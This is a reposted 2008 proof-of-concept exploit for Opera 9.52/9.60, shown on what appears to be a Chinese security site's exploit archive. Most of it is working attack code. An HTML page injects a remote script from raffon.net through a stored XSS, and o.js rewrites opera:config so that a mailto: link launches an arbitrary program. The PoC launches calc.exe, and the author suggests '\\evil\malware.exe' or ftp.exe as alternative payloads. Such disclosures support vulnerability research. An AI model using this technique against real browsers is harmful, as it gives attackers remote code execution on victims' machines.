首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Opera 9.52/9.60 Stored Cross Site Scripting Code Exec PoC
来源:http://aviv.raffon.net 作者:Aviv 发布时间:2008-10-24  
<!--
Just found a way to use Stefano’s opera:config idea to execute code from remote.

Instead of changing the HTTP Proxy, an attacker can change the default external
mail application to “\\evil\malware.exe ”, or to local commands (e.g. ftp.exe
which can be used to download malicious binaries from remote). Also, there is a
need to change the “Mail Handler” settings to “2”, so opera will execute the
external mail application, instead of the default opera mail application.

After changing the settings, the attacker can simply set the location to “mailto:” to execute the code.


A proof-of-concept which executes the Windows Calculator can be found here: http://raffon.net/research/opera/history/op.html


Cheers,

--Aviv.

http://aviv.raffon.net
-->

<html>
<title>bb</title>
<script>
var z=null;
function x() {
  window.setTimeout("z=window.open('opera:historysearch?q=%2A');window.focus();",1500);
  window.setTimeout("z.close();",3000);
  window.setTimeout("location.href='mailto:'",3000);
}
</script>
<body>
<a href="#<script src='http://www.raffon.net/research/opera/history/o.js'></script>" onclick="x()">Click me...</a>
</body>
</html>

<o.js>
s=document.createElement("IFRAME");
s.src="opera:config";
document.body.appendChild(s);
s.src="javascript:opera.setPreference('Mail','External Application','c:\\\\windows\\\\system32\\\\calc.exe');opera.setPreference('Mail','Handler','2');parent.window.close()";
</o.js>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Exploits Asterisk 1.4,1.6 et.
·CSPartner 1.0 (Delete All User
·SilverSHielD 1.0.2.34 (opendir
·LoudBlog <= 0.8.0a (ajax.php)
·MindDezign Photo Gallery 2.2 A
·LibSPF2 < 1.2.8 DNS TXT Record
·CSSH is a proof of concept CSS
·GoodTech SSH (SSH_FXP_OPEN) Re
·VLC 0.9.4 .TY File Buffer Over
·FreeSSH version 1.2.1 denial o
·MS08066本地权限提升漏洞exploit
·Opera <= 9.60 Stored Cross Sit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved